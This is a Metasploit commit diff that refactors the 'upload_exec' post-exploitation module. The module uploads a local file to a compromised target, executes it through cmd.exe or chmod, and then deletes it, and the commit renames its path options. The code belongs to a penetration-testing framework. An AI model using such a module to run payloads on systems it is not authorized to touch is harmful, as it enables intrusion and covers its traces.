Land #10384, upload_exec fixes

4.x
William Vu 2018-07-30 13:55:40 -05:00 committed by Metasploit
parent e6d9f39204
commit 2cb4b97164
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
1 changed files with 22 additions and 13 deletions

View File

@ -18,34 +18,43 @@ class MetasploitModule < Msf::Post
register_options( register_options(
[ [
OptPath.new('LFILE', [true,'Local file to upload and execute']), OptPath.new('LPATH', [true,'Local file path to upload and execute']),
OptString.new('RFILE', [false,'Name of file on target (default is basename of LFILE)']), OptString.new('RPATH', [false,'Remote file path on target (default is basename of LPATH)']),
]) ])
end end
def rfile def rpath
if datastore['RFILE'].blank? if datastore['RPATH'].blank?
remote_name = File.basename(datastore['LFILE']) remote_name = File.basename(datastore['LPATH'])
else else
remote_name = datastore['RFILE'] remote_name = datastore['RPATH']
end end
remote_name remote_name
end end
def lfile def lpath
datastore['LFILE'] datastore['LPATH']
end end
def run def run
upload_file(rfile, lfile) upload_file(rpath, lpath)
if session.platform.include?("windows") if session.platform.include?("windows")
cmd_exec("cmd.exe /c start #{rfile}", nil, 0) cmd_exec("cmd.exe /c start #{rpath}", nil, 0)
else else
cmd_exec("chmod 755 #{rfile} && ./#{rfile}", nil, 0) cmd = "chmod 700 #{rpath} && "
# Handle absolute paths
if rpath.start_with?('/')
cmd << rpath
else
cmd << "./#{rpath}"
end
cmd_exec(cmd, nil, 0)
end end
rm_f(rfile)
rm_f(rpath)
end end
end end